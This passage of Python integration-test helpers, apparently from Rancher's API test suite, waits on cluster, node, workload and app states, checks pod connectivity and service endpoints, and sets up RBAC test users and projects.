            return matches[0].state
        print("Node does not exist anymore -" + uuid)
        return _GONE

    status = current_state()
    if status is _GONE:
        return None
    while status != state:
        if time.time() - start > MACHINE_TIMEOUT:
            raise AssertionError(
                "Timed out waiting for state to get to active")
        time.sleep(5)
        status = current_state()
        if status is _GONE:
            return None
    return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
    """Wait until no node with node.uuid is returned by the API.

    @param client: management client used to list nodes
    @param node: node object expected to disappear
    @param timeout: max seconds to wait before failing
    """
    uuid = node.uuid
    start = time.time()
    nodes = client.list_node(uuid=uuid).data
    node_count = len(nodes)
    while node_count != 0:
        if time.time() - start > timeout:
            # message fixed: it used to say "state to get to active",
            # copy-pasted from another waiter
            raise AssertionError(
                "Timed out waiting for node to be deleted")
        time.sleep(.5)
        nodes = client.list_node(uuid=uuid).data
        node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
                                timeout=300):
    """Wait until *cluster* reports exactly *expected_node_count* nodes.

    @param timeout: max seconds to wait before failing
    """
    start = time.time()
    nodes = client.list_node(clusterId=cluster.id).data
    node_count = len(nodes)
    while node_count != expected_node_count:
        if time.time() - start > timeout:
            # message fixed: it used to say "state to get to active",
            # copy-pasted from another waiter
            raise AssertionError(
                "Timed out waiting for cluster node count to reach " +
                str(expected_node_count))
        time.sleep(.5)
        nodes = client.list_node(clusterId=cluster.id).data
        node_count = len(nodes)
def get_custom_host_registration_cmd(client, cluster, roles, node):
    """Build the command that registers *node* into *cluster*.

    Linux nodes get one "--<role>" flag per requested role; Windows nodes
    (ssh_user == 'Administrator') are always registered as workers.
    """
    allowed_roles = ["etcd", "worker", "controlplane"]
    tokens = client.list_cluster_registration_token(
        clusterId=cluster.id).data
    token = tokens[0] if tokens else \
        create_custom_host_registration_token(client, cluster)
    additional_options = " --address " + node.public_ip_address + \
                         " --internal-address " + node.private_ip_address
    if node.ssh_user == 'Administrator':
        # Windows: inject the worker flag and addresses before "| iex"
        cmd = token.windowsNodeCommand.replace(
            '| iex', '--worker' + additional_options + ' | iex ')
    else:
        cmd = token.nodeCommand
        for role in roles:
            assert role in allowed_roles
            cmd += " --" + role
        cmd += additional_options
    return cmd
def create_custom_host_registration_token(client, cluster):
    """Create and return an active registration token for *cluster*."""
    # Give the "cluster_owner" CRTB a moment to take effect first.
    time.sleep(5)
    token = client.wait_success(
        client.create_cluster_registration_token(clusterId=cluster.id))
    assert token.state == 'active'
    return token
def get_cluster_by_name(client, name):
    """Return the single cluster named *name*; fail if it does not exist."""
    matches = client.list_cluster(name=name).data
    assert len(matches) == 1, "Cluster " + name + " does not exist"
    return matches[0]
def get_cluster_type(client, cluster):
    """Classify a cluster as "Custom", "Imported" or its provider config key."""
    hosted_configs = [
        "amazonElasticContainerServiceConfig",
        "azureKubernetesServiceConfig",
        "googleKubernetesEngineConfig",
        "rancherKubernetesEngineConfig"
    ]
    if "rancherKubernetesEngineConfig" in cluster:
        nodes = client.list_node(clusterId=cluster.id).data
        # An RKE cluster whose first node has no node template was added
        # through the custom registration command.
        if len(nodes) > 0 and nodes[0].nodeTemplateId is None:
            return "Custom"
    for config in hosted_configs:
        if config in cluster:
            return config
    return "Imported"
def delete_cluster(client, cluster):
    """Delete *cluster* via the API; for Imported/Custom clusters also
    terminate the underlying AWS instances first.

    AWS instances are located by name patterns (testcustom*/teststress*/
    testsa*) combined with the nodes' public IPs, falling back to an
    IP-only lookup when the name patterns match nothing.
    """
    nodes = client.list_node(clusterId=cluster.id).data
    # Delete nodes(in cluster) from AWS for Imported and Custom Cluster
    if len(nodes) > 0:
        cluster_type = get_cluster_type(client, cluster)
        print(cluster_type)
        if get_cluster_type(client, cluster) in ["Imported", "Custom"]:
            filters = [
                {'Name': 'tag:Name',
                 'Values': ['testcustom*', 'teststress*', 'testsa*']}]
            ip_filter = {}
            ip_list = []
            ip_filter['Name'] = \
                'network-interface.addresses.association.public-ip'
            # NOTE: ip_filter keeps a reference to ip_list, so the appends
            # in the loop below also populate the already-added filter.
            ip_filter['Values'] = ip_list
            filters.append(ip_filter)
            for node in nodes:
                host_ip = resolve_node_ip(node)
                ip_list.append(host_ip)
            assert len(ip_filter) > 0
            print(ip_filter)
            aws_nodes = AmazonWebServices().get_nodes(filters)
            if aws_nodes is None:
                # search instances by IPs in case names do not follow patterns
                aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
            if aws_nodes is None:
                print("no instance is found in AWS")
            else:
                for node in aws_nodes:
                    print(node.public_ip_address)
                AmazonWebServices().delete_nodes(aws_nodes)
    # Delete Cluster
    client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
                                         workload2, allow_connectivity=True):
    """Ping every pod of workload2 from every pod of workload1."""
    source_pods = p_client1.list_pod(workloadId=workload1.id).data
    dest_pods = p_client2.list_pod(workloadId=workload2.id).data
    for src in source_pods:
        for dst in dest_pods:
            check_connectivity_between_pods(src, dst, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
    """Check pairwise connectivity (including self) among a workload's pods."""
    pods = p_client.list_pod(workloadId=workload.id).data
    for src in pods:
        for dst in pods:
            check_connectivity_between_pods(src, dst)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
    """Ping pod2 from pod1 and assert the expected (un)reachability."""
    target_ip = pod2.status.podIp
    if is_windows():
        cmd = 'ping -w 1 -n 1 {0}'.format(target_ip)
        success_marker = " (0% loss)"
        failure_marker = " (100% loss)"
    else:
        cmd = "ping -c 1 -W 1 " + target_ip
        success_marker = " 0% packet loss"
        failure_marker = " 100% packet loss"
    response = str(kubectl_pod_exec(pod1, cmd))
    assert target_ip in response
    expected_marker = success_marker if allow_connectivity else failure_marker
    assert expected_marker in response
def kubectl_pod_exec(pod, cmd):
    """Run *cmd* inside *pod* via `kubectl exec` and return the raw output."""
    full_cmd = "exec {} -n {} -- {}".format(pod.name, pod.namespaceId, cmd)
    return execute_kubectl_cmd(full_cmd, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
    """Run *cmd* over SSH on ip:port and return stdout as a list of lines.

    Authenticates with *sshKey* when given, otherwise with *password*.
    """
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        if sshKey:
            ssh.connect(ip, username=user, key_filename=sshKey, port=port)
        else:
            ssh.connect(ip, username=user, password=password, port=port)
        stdin, stdout, stderr = ssh.exec_command(cmd)
        response = stdout.readlines()
    finally:
        # The connection used to be leaked; always release it.
        ssh.close()
    return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
    """Poll until the namespace reaches state "active"; return the fresh copy."""
    start = time.time()
    time.sleep(2)

    def fetch():
        matches = client.list_namespace(uuid=ns.uuid).data
        assert len(matches) == 1
        return matches[0]

    current = fetch()
    while current.state != "active":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to active")
        time.sleep(.5)
        current = fetch()
    return current
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
                        timeout=DEFAULT_TIMEOUT):
    """Wait until all *numofpods* pods of *workload* run *expectedimage*.

    Pods are looked up with kubectl by each of the workload's labels.
    @raise AssertionError: when any pod still runs another image at timeout
    """
    start = time.time()
    for key, value in workload.workloadLabels.items():
        label = key + "=" + value
        get_pods = "get pods -l" + label + " -n " + ns_name
        pods = execute_kubectl_cmd(get_pods)
        # was range(0, numofpods - 1), which skipped the last pod
        for x in range(0, numofpods):
            pod = pods["items"][x]
            podimage = pod["spec"]["containers"][0]["image"]
            while podimage != expectedimage:
                if time.time() - start > timeout:
                    raise AssertionError(
                        "Timed out waiting for correct pod images")
                time.sleep(.5)
                pods = execute_kubectl_cmd(get_pods)
                pod = pods["items"][x]
                podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
                              timeout=DEFAULT_TIMEOUT):
    """Wait until the workload has exactly *pod_count* pods; return them."""
    start = time.time()
    while True:
        pods = p_client.list_pod(workloadId=workload.id).data
        if len(pods) == pod_count:
            return pods
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for pods in workload {}. Expected {}. "
                "Got {}".format(workload.name, pod_count, len(pods)))
        time.sleep(.5)
def get_user_client_and_cluster(client=None):
    """Return (user client, target cluster), honoring CLUSTER_NAME if set."""
    if not client:
        client = get_user_client()
    if CLUSTER_NAME != "":
        clusters = client.list_cluster(name=CLUSTER_NAME).data
    else:
        clusters = client.list_cluster().data
    assert len(clusters) > 0
    return client, clusters[0]
def get_global_admin_client_and_cluster():
    """Return (global admin client, target cluster), honoring CLUSTER_NAME."""
    client = get_admin_client()
    if CLUSTER_NAME != "":
        clusters = client.list_cluster(name=CLUSTER_NAME).data
    else:
        clusters = client.list_cluster().data
    assert len(clusters) > 0
    return client, clusters[0]
def validate_cluster_state(client, cluster,
                           check_intermediate_state=True,
                           intermediate_state="provisioning",
                           nodes_not_in_active_state=None):
    """Wait for *cluster* to settle into "active" and report how long it took.

    @param check_intermediate_state: also assert that the cluster passes
        through *intermediate_state* (e.g. "provisioning") first
    @param nodes_not_in_active_state: hostnames excluded from the node check
    @return: the refreshed cluster object (with "version" synced)
    """
    # None default instead of a shared mutable [] default argument.
    if nodes_not_in_active_state is None:
        nodes_not_in_active_state = []
    start_time = time.time()
    if check_intermediate_state:
        cluster = wait_for_condition(
            client, cluster,
            lambda x: x.state == intermediate_state,
            lambda x: 'State is: ' + x.state,
            timeout=MACHINE_TIMEOUT)
        assert cluster.state == intermediate_state
    cluster = wait_for_condition(
        client, cluster,
        lambda x: x.state == "active",
        lambda x: 'State is: ' + x.state,
        timeout=MACHINE_TIMEOUT)
    assert cluster.state == "active"
    wait_for_nodes_to_become_active(client, cluster,
                                    exception_list=nodes_not_in_active_state)
    # Wait (up to 60s) for the K8s "version" field to be synced onto the object.
    timeout = 60
    start = time.time()
    while "version" not in cluster.keys():
        time.sleep(1)
        cluster = client.reload(cluster)
        delta = time.time() - start
        if delta > timeout:
            msg = "Timeout waiting for K8s version to be synced"
            raise Exception(msg)
    end_time = time.time()
    diff = time.strftime("%H:%M:%S", time.gmtime(end_time - start_time))
    print("The total time for provisioning/updating the cluster {} : {}".
          format(cluster.name, diff))
    return cluster
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
    """Reload *obj* with exponential backoff until it is visible.

    A 403 ApiError means the object is not (yet) visible to this client
    and is retried; any other ApiError propagates immediately.
    @raise Exception: when *timeout* seconds elapse without success
    """
    start = time.time()
    delay = 0.01
    while True:
        time.sleep(delay)
        # double the backoff, capped at 2 seconds
        delay = min(delay * 2, 2)
        try:
            obj = client.reload(obj)
        except ApiError as e:
            if e.error.status != 403:
                raise e
        else:
            return obj
        elapsed = time.time() - start
        if elapsed > timeout:
            raise Exception(
                'Timeout waiting for [{}:{}] for condition after {}'
                ' seconds'.format(obj.type, obj.id, elapsed))
def delete_node(aws_nodes):
    """Terminate every AWS node in *aws_nodes*."""
    for aws_node in aws_nodes:
        AmazonWebServices().delete_node(aws_node)
def cluster_cleanup(client, cluster, aws_nodes=None):
    """Delete the cluster (and its AWS nodes) when cleanup is enabled.

    When RANCHER_CLEANUP_CLUSTER is falsy, instead write the environment's
    connection details to the config file for later reuse.
    """
    if RANCHER_CLEANUP_CLUSTER:
        client.delete(cluster)
        if aws_nodes is not None:
            delete_node(aws_nodes)
    else:
        lines = [
            "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'",
            "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'",
            "env.USER_TOKEN='" + USER_TOKEN + "'",
            "env.CLUSTER_NAME='" + cluster.name + "'",
        ]
        create_config_file("\n".join(lines) + "\n")
def create_config_file(env_details):
    """Overwrite the env file (module-level `env_file`) with *env_details*."""
    # `with` guarantees the handle is closed even if write() raises.
    with open(env_file, "w") as f:
        f.write(env_details)
def validate_hostPort(p_client, workload, source_port, cluster):
    """Validate a hostPort workload answers on each node that hosts a pod."""
    get_endpoint_url_for_workload(p_client, workload)
    wl = p_client.list_workload(uuid=workload.uuid).data[0]
    assert source_port == wl.publicEndpoints[0]["port"], \
        "Source ports do not match"
    pods = p_client.list_pod(workloadId=workload.id).data
    for node in get_schedulable_nodes(cluster):
        # hostPort only answers on nodes actually running a pod; at most
        # one matching pod per node is collected.
        expected_names = []
        for pod in pods:
            print(pod.nodeId + " check " + node.id)
            if pod.nodeId == node.id:
                expected_names.append(pod.name)
                break
        if expected_names:
            host_ip = resolve_node_ip(node)
            curl_cmd = " http://{}:{}/name.html".format(host_ip,
                                                        str(source_port))
            validate_http_response(curl_cmd, expected_names)
def validate_lb(p_client, workload, source_port):
    """Validate a load-balancer endpoint serves the workload's pods."""
    url = get_endpoint_url_for_workload(p_client, workload)
    wl = p_client.list_workload(uuid=workload.uuid).data[0]
    assert source_port == wl.publicEndpoints[0]["port"], \
        "Source ports do not match"
    expected_names = get_target_names(p_client, [workload])
    wait_until_lb_is_active(url)
    validate_http_response(url + "/name.html", expected_names)
def validate_nodePort(p_client, workload, cluster, source_port):
    """Validate a NodePort service answers on every schedulable node."""
    get_endpoint_url_for_workload(p_client, workload, 600)
    wl = p_client.list_workload(uuid=workload.uuid).data[0]
    source_port_wk = wl.publicEndpoints[0]["port"]
    assert source_port == source_port_wk, "Source ports do not match"
    expected_names = [pod.name
                      for pod in p_client.list_pod(workloadId=wl.id).data]
    print("target name list:" + str(expected_names))
    for node in get_schedulable_nodes(cluster):
        host_ip = resolve_node_ip(node)
        curl_cmd = " http://{}:{}/name.html".format(host_ip,
                                                    str(source_port_wk))
        validate_http_response(curl_cmd, expected_names)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
    """Validate the workload's ClusterIP answers from every test pod."""
    pods = p_client.list_pod(workloadId=workload.id).data
    expected_names = [pod["name"] for pod in pods]
    curl_cmd = "http://{}:{}/name.html".format(cluster_ip, str(source_port))
    for test_pod in test_pods:
        validate_http_response(curl_cmd, expected_names, test_pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
    """Poll until the persistent volume reaches state "available"; return it."""
    start = time.time()
    time.sleep(2)
    # renamed from `list`, which shadowed the builtin
    pv_list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
    assert len(pv_list) == 1
    pv = pv_list[0]
    while pv.state != "available":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to available")
        time.sleep(.5)
        pv_list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
        assert len(pv_list) == 1
        pv = pv_list[0]
    return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
    """Poll until the persistent volume claim reaches state "bound"; return it."""
    start = time.time()
    time.sleep(2)
    # renamed from `list`, which shadowed the builtin
    pvc_list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
    assert len(pvc_list) == 1
    pvc = pvc_list[0]
    while pvc.state != "bound":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to bound")
        time.sleep(.5)
        pvc_list = \
            p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
        assert len(pvc_list) == 1
        pvc = pvc_list[0]
    return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
                       mount_path, sub_path, is_daemonSet=False):
    """Create a workload (deployment or daemonset) mounting an NFS-backed PVC."""
    volumes = [{"type": "volume",
                "name": "vol1",
                "persistentVolumeClaim": {
                    "readOnly": "false",
                    "type": "persistentVolumeClaimVolumeSource",
                    "persistentVolumeClaimId": pvc_name
                }}]
    volume_mounts = [{"readOnly": "False",
                      "type": "volumeMount",
                      "mountPath": mount_path,
                      "subPath": sub_path,
                      "name": "vol1"
                      }]
    containers = [{"name": "test1",
                   "image": TEST_IMAGE,
                   "volumeMounts": volume_mounts
                   }]
    kwargs = dict(name=wl_name,
                  containers=containers,
                  namespaceId=ns_id,
                  volumes=volumes)
    if is_daemonSet:
        kwargs["daemonSetConfig"] = {}
    return p_client.create_workload(**kwargs)
def write_content_to_file(pod, content, filename):
    """Write *content* into *filename* inside *pod*; assert empty output."""
    cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
    if is_windows():
        # Literal braces of the powershell script block must be doubled;
        # the previous single braces made str.format raise ValueError.
        cmd_write = \
            'powershell -NoLogo -NonInteractive -Command ' \
            '"& {{ echo {1} > {0} }}"'.format(filename, content)
    output = kubectl_pod_exec(pod, cmd_write)
    assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
    """Assert that *filename* inside *pod* contains exactly *content*."""
    cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
    if is_windows():
        # Literal braces of the powershell script block must be doubled;
        # the previous single braces made str.format raise ValueError.
        cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
                          '"& {{ cat {0} }}"'.format(filename)
    output = kubectl_pod_exec(pod, cmd_get_content)
    assert output.strip().decode('utf-8') == content
def wait_for_mcapp_to_active(client, multiClusterApp,
                             timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
    """Wait until the multi-cluster app reports state "active"; return it.

    Sleeps first: right after deployment the app transiently shows
    "active" before flipping to installing/deploying.
    """
    time.sleep(5)
    mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
                                         name=multiClusterApp.name).data
    start = time.time()
    assert len(mcapps) == 1, "Cannot find multi cluster app"
    current = mcapps[0]
    while current.state != "active":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to active")
        time.sleep(.5)
        refreshed = client.list_multiClusterApp(
            uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
        assert len(refreshed) == 1
        current = refreshed[0]
    return current
def wait_for_app_to_active(client, app_id,
                           timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
    """
    First wait for app to come in deployment state, then wait for it get
    in active state. This is to avoid wrongly conclude that app is active
    as app goes to state installing > active > deploying > active
    @param client: Project client
    @param app_id: App id of deployed app.
    @param timeout: Max time allowed to wait for app to become active.
    @return: app object
    """
    start = time.time()
    app_data = client.list_app(id=app_id).data
    # Phase 1: wait (up to timeout/10) for the app to be listable at all.
    while len(app_data) == 0:
        if time.time() - start > timeout / 10:
            raise AssertionError(
                "Timed out waiting for listing the app from API")
        time.sleep(.2)
        app_data = client.list_app(id=app_id).data
    application = app_data[0]
    # Phase 2: wait (up to timeout/3) for "deploying"; give up silently —
    # per the docstring the app may pass through states quickly, so missing
    # "deploying" here is not an error.
    while application.state != "deploying":
        if time.time() - start > timeout / 3:
            break
        time.sleep(.2)
        app_data = client.list_app(id=app_id).data
        application = app_data[0]
    # Phase 3: wait for the final "active" state (full timeout budget).
    while application.state != "active":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to active")
        time.sleep(.5)
        app = client.list_app(id=app_id).data
        assert len(app) >= 1
        application = app[0]
    return application
def wait_for_app_to_remove(client, app_id,
                           timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
    """Wait until the app is gone or no longer in removing/active state."""
    start = time.time()
    apps = client.list_app(id=app_id).data
    if len(apps) == 0:
        return
    application = apps[0]
    while application.state in ("removing", "active"):
        # only a tenth of the overall budget is allowed for removal
        if time.time() - start > timeout / 10:
            raise AssertionError(
                "Timed out waiting for app to not be installed")
        time.sleep(.2)
        apps = client.list_app(id=app_id).data
        if len(apps) == 0:
            break
        application = apps[0]
def validate_response_app_endpoint(p_client, appId,
                                   timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
    """Poll the app's ingress endpoints until one returns HTTP 200."""
    ingresses = p_client.list_ingress(namespaceId=appId).data
    assert len(ingresses) == 1
    ingress = ingresses[0]
    if hasattr(ingress, 'publicEndpoints'):
        for endpoint in ingress.publicEndpoints:
            url = "{}://{}".format(endpoint["protocol"].lower(),
                                   endpoint["hostname"])
            print(url)
            deadline = time.time() + timeout
            try:
                while True:
                    resp = requests.head(url)
                    print(resp.status_code)
                    if resp.status_code == 200:
                        return
                    if time.time() > deadline:
                        raise AssertionError(
                            "Timed out waiting response to be 200.")
                    time.sleep(.5)
            except requests.ConnectionError:
                print("failed to connect")
                assert False, "failed to connect to the app"
def resolve_node_ip(node):
    """Prefer the node's external IP; fall back to its plain ipAddress."""
    if hasattr(node, 'externalIpAddress'):
        return node.externalIpAddress
    return node.ipAddress
def provision_nfs_server():
    """Create an AWS node and configure it as an NFS server via setup script."""
    node = AmazonWebServices().create_node(random_test_name("nfs-server"))
    node.wait_for_ssh_ready()
    c_path = os.getcwd()
    cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
    # read via a context manager so the handle is closed (was leaked)
    with open(cmd_path, 'r') as script:
        command = script.read()
    node.execute_command(command)
    return node
def get_defaut_question_answers(client, externalId):
    """Build a default answer set for every question of a catalog template.

    Fetches the template revision identified by *externalId* and walks its
    questions (honoring showIf/showSubquestionIf conditions), picking the
    declared default or a type-appropriate fake value for required fields.
    @param client: API client used to look up the template version
    @param externalId: catalog external id of the template revision
    @return: dict mapping question variable -> chosen answer
    """
    def get_answer(quest):
        # Start from the declared default (or empty string if none).
        if "default" in quest.keys():
            answer = quest["default"]
        else:
            answer = ""
        # If required and no default value is available, set fake value
        # only for type string . For other types error out
        # NOTE(review): this branch runs even when a default exists, so a
        # required enum/password/string default is overridden (and any other
        # required type asserts) — confirm this is intended.
        if "required" in quest.keys():
            if quest["required"]:
                if quest["type"] == "enum" and "options" in quest.keys():
                    answer = quest["options"][0]
                elif quest["type"] == "password":
                    answer = "R@ncher135"
                elif quest["type"] == "string":
                    answer = "fake"
                else:
                    assert False, \
                        "Cannot set default for types {}" \
                        "".format(quest["type"])
        return answer
    def check_if_question_needed(questions_and_answers, ques):
        # Evaluate the "showIf" expression: clauses joined by "&&", each of
        # the form "<variable>=<value>" (a missing value means empty string);
        # all clauses must match the answers collected so far.
        add_question = False
        match_string = ques["showIf"]
        match_q_as = match_string.split("&&")
        for q_a in match_q_as:
            items = q_a.split("=")
            if len(items) == 1:
                items.append("")
            if items[0] in questions_and_answers.keys():
                if questions_and_answers[items[0]] == items[1]:
                    add_question = True
                else:
                    add_question = False
                    break
        return add_question
    questions_and_answers = {}
    print("external id = {}".format(externalId))
    template_revs = client.list_template_version(externalId=externalId).data
    assert len(template_revs) == 1
    template_rev = template_revs[0]
    questions = template_rev.questions
    for ques in questions:
        add_question = True
        if "showIf" in ques.keys():
            add_question = \
                check_if_question_needed(questions_and_answers, ques)
        if add_question:
            question = ques["variable"]
            answer = get_answer(ques)
            questions_and_answers[question] = get_answer(ques)
            # Subquestions are included only when the parent's answer equals
            # the declared showSubquestionIf trigger value.
            if "showSubquestionIf" in ques.keys():
                if ques["showSubquestionIf"] == answer:
                    sub_questions = ques["subquestions"]
                    for sub_question in sub_questions:
                        question = sub_question["variable"]
                        questions_and_answers[question] = \
                            get_answer(sub_question)
    print("questions_and_answers = {}".format(questions_and_answers))
    return questions_and_answers
def validate_app_deletion(client, app_id,
                          timeout=DEFAULT_APP_DELETION_TIMEOUT):
    """Wait until app *app_id* leaves the "removing" state or disappears."""
    apps = client.list_app(id=app_id).data
    start = time.time()
    if len(apps) == 0:
        return
    application = apps[0]
    while application.state == "removing":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for app to delete")
        time.sleep(.5)
        apps = client.list_app(id=app_id).data
        if len(apps) == 0:
            break
        application = apps[0]
def validate_catalog_app(proj_client, app, external_id, answer=None):
    """
    This method validates all the workloads deployed are in active state,
    have correct version and validates the answers.
    @param proj_client: Project client object of a existing project.
    @param app: Deployed app object.
    @param external_id: URl of app API.
    @param answer: answer, app seek while deploying, body of the post call.
    @return: Deployed app object.
    """
    if answer is None:
        answers = get_defaut_question_answers(get_user_client(), external_id)
    else:
        answers = answer
    # validate app is active
    app = wait_for_app_to_active(proj_client, app.id)
    assert app.externalId == external_id, \
        "the version of the app is not correct"
    # check if associated workloads are active
    ns = app.targetNamespace
    # external_id is "&"-separated; its last two parameters carry the
    # chart name ("template=...") and version ("version=...").
    parameters = external_id.split('&')
    assert len(parameters) > 1, \
        "Incorrect list of parameters from catalog external ID"
    chart_prefix = parameters[len(parameters) - 2].split("=")[1]
    chart_suffix = parameters[len(parameters) - 1].split("=")[1]
    chart = chart_prefix + "-" + chart_suffix
    app_name = parameters[len(parameters) - 2].split("=")[1]
    workloads = proj_client.list_workload(namespaceId=ns).data
    # For longhorn app, only active state of workloads is verified as longhorn
    # workloads do not have the field workloadLabels
    # For all other apps active state of workloads & chart version are verified
    if "longhorn" in app.externalId:
        print("validating the Longhorn app, it may take longer than others")
        for wl in workloads:
            wait_for_wl_to_active(proj_client, wl)
    else:
        for wl in workloads:
            print("Workload {} , state - {}".format(wl.id, wl.state))
            assert wl.state == "active"
            chart_deployed = get_chart_info(wl.workloadLabels)
            print("Chart detail of app - {}".format(chart_deployed))
            # '-' check is to make sure chart has both app name and version.
            if app_name in chart_deployed and '-' in chart_deployed:
                assert chart_deployed == chart, "the chart version is wrong"
    # Validate_app_answers
    # dict.items() views support set difference: every expected answer must
    # appear with the same value among the app's applied answers.
    assert len(answers.items() - app["answers"].items()) == 0, \
        "Answers are not same as the original catalog answers"
    return app
def get_chart_info(workloadlabels):
    """
    Return the chart identifier ('app_name-version') from workload labels.

    Looks for the 'chart' label first, then 'helm.sh/chart'; returns ''
    when neither label is present.
    @param workloadlabels: workloadslabel object
    """
    labels = workloadlabels.keys()
    if "chart" in labels:
        return workloadlabels.chart
    if "helm.sh/chart" in labels:
        return workloadlabels["helm.sh/chart"]
    return ''
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
    """Create a random standard user with the global "user" role.

    @return: (user object, login token)
    """
    username = random_name()
    user = client.create_user(username=username,
                              password=USER_PASSWORD)
    client.create_global_role_binding(globalRoleId="user",
                                      subjectKind="User",
                                      userId=user.id)
    token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
    return user, token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
    """Log in against the auth endpoint and return the API token."""
    payload = {
        'username': username,
        'password': password,
        'responseType': 'json',
    }
    # verify=False: test environments use self-signed certificates
    r = requests.post(cattle_auth_url, json=payload, verify=False)
    print(r.json())
    return r.json()["token"]
def rbac_get_user_by_role(role):
    """Return the prepared RBAC test user for *role*, or None if unknown."""
    entry = rbac_data["users"].get(role)
    return entry["user"] if entry else None
def rbac_get_user_token_by_role(role):
    """Return the login token of the RBAC test user for *role*, or None."""
    entry = rbac_data["users"].get(role)
    return entry["token"] if entry else None
def rbac_get_kubeconfig_by_role(role):
    """Return the kubeconfig path of the RBAC test user for *role*, or None."""
    entry = rbac_data["users"].get(role)
    return entry["kubeconfig"] if entry else None
def rbac_get_project():
    """Return the shared project created by rbac_prepare()."""
    return rbac_data["project"]
def rbac_get_namespace():
    """Return the namespace inside the shared RBAC project."""
    return rbac_data["namespace"]
def rbac_get_workload():
    """Return the workload deployed in the shared RBAC project."""
    return rbac_data["workload"]
def rbac_get_unshared_project():
    """Return the project no RBAC test user is assigned to."""
    return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
    """Return the namespace of the unshared project."""
    return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
    """Return the workload deployed in the unshared project."""
    return rbac_data["wl_unshared"]
def rbac_prepare():
    """Create the RBAC test fixtures: one shared project with a workload,
    one unshared project with a workload, and five users bound to the
    cluster/project roles listed below (each with its own kubeconfig)."""
    admin_client, cluster = get_global_admin_client_and_cluster()
    create_kubeconfig(cluster)
    # create a new project in the cluster
    project, ns = create_project_and_ns(ADMIN_TOKEN,
                                        cluster,
                                        random_test_name("p-test-rbac"))
    con = [{"name": "test1",
            "image": TEST_IMAGE}]
    name = random_test_name("default")
    p_client = get_project_client_for_token(project, ADMIN_TOKEN)
    workload = p_client.create_workload(name=name,
                                        containers=con,
                                        namespaceId=ns.id)
    validate_workload(p_client, workload, "deployment", ns.name)
    rbac_data["workload"] = workload
    rbac_data["project"] = project
    rbac_data["namespace"] = ns
    # create new users
    for key in rbac_data["users"]:
        user1, token1 = create_user(admin_client)
        rbac_data["users"][key]["user"] = user1
        rbac_data["users"][key]["token"] = token1
    # assign different role to each user
    assign_members_to_cluster(admin_client,
                              rbac_data["users"][CLUSTER_OWNER]["user"],
                              cluster,
                              CLUSTER_OWNER)
    assign_members_to_cluster(admin_client,
                              rbac_data["users"][CLUSTER_MEMBER]["user"],
                              cluster,
                              CLUSTER_MEMBER)
    assign_members_to_project(admin_client,
                              rbac_data["users"][PROJECT_MEMBER]["user"],
                              project,
                              PROJECT_MEMBER)
    assign_members_to_project(admin_client,
                              rbac_data["users"][PROJECT_OWNER]["user"],
                              project,
                              PROJECT_OWNER)
    assign_members_to_project(admin_client,
                              rbac_data["users"][PROJECT_READ_ONLY]["user"],
                              project,
                              PROJECT_READ_ONLY)
    # create kubeconfig files for each user
    for key in rbac_data["users"]:
        user_client = get_client_for_token(rbac_data["users"][key]["token"])
        _, user_cluster = get_user_client_and_cluster(user_client)
        rbac_data["users"][key]["kubeconfig"] = os.path.join(
            os.path.dirname(os.path.realpath(__file__)),
            key + "_kubeconfig")
        create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
    # create another project that none of the above users are assigned to
    p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
                                    cluster,
                                    random_test_name("p-unshared"))
    name = random_test_name("default")
    p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
    workload = p_client.create_workload(name=name,
                                        containers=con,
                                        namespaceId=ns2.id)
    validate_workload(p_client, workload, "deployment", ns2.name)
    rbac_data["p_unshared"] = p2
    rbac_data["ns_unshared"] = ns2
